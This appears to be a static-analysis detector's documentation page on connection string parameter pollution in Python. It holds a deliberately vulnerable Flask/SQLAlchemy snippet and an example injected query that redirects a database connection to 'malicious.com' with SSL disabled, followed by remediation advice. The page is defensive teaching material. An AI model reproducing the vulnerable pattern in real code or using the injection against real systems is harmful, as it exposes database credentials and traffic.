Connection String Parameter Pollution
ID |
python.connection_string_parameter_pollution |
Severity |
critical |
Resource |
Resource Management |
Language |
Python |
Tags |
CWE:15, NIST.SP.800-53, OWASP:2021:A5, PCI-DSS:6.5.1 |
Rationale
Database connectivity typically involves constructing a connection string – a snippet of text encoding the details of the connection to the database, such as hostname, database name, and credentials.
When user input is improperly included in a connection string, it can lead to parameter pollution. This means that the attacker can inject additional parameters or override existing ones, potentially accessing databases they shouldn’t or altering their privileges.
Below is a vulnerable Python code snippet demonstrating this issue:
from flask import request
from sqlalchemy import create_engine
def connect_to_database():
user_host = request.args.get("host")
conn_str = f"postgresql://user:password@{user_host}/mydb"
engine = create_engine(conn_str)
return engine.connect()If an attacker submits the following query:
/?host=localhost:5432@malicious.com/mydb?sslmode=disableThe resulting connection string becomes:
postgresql://user:password@localhost:5432@malicious.com/mydb?sslmode=disableThis could:
-
Redirect the connection to an attacker-controlled host.
-
Disable SSL/TLS encryption.
-
Leak credentials.
Remediation
Mitigating connection string parameter pollution involves several key practices:
-
Use Parameter Objects: Avoid concatenating user input into connection strings. Instead, use APIs or configurations that separate parameters from the connection logic.
-
Validate and Sanitize User Input: If user input must be incorporated into the connection process, ensure it is strictly validated and sanitized according to expected patterns.
-
Environment Configuration: Use environment variables or configuration files to manage sensitive credential information away from user modification capabilities.
Configuration
The detector has the following configurable parameters:
-
sources, that indicates the source kinds to check. -
neutralizations, that indicates the neutralization kinds to check.
Unless you need to change the default behavior, you typically do not need to configure this detector.
References
-
CWE-15 : External Control of System or Configuration Setting.
-
Connection String Parameter Pollution Attacks, by C. Alonso, Blackhat DC 2010.
-
OWASP Top 10 2021 - A03 : Injection.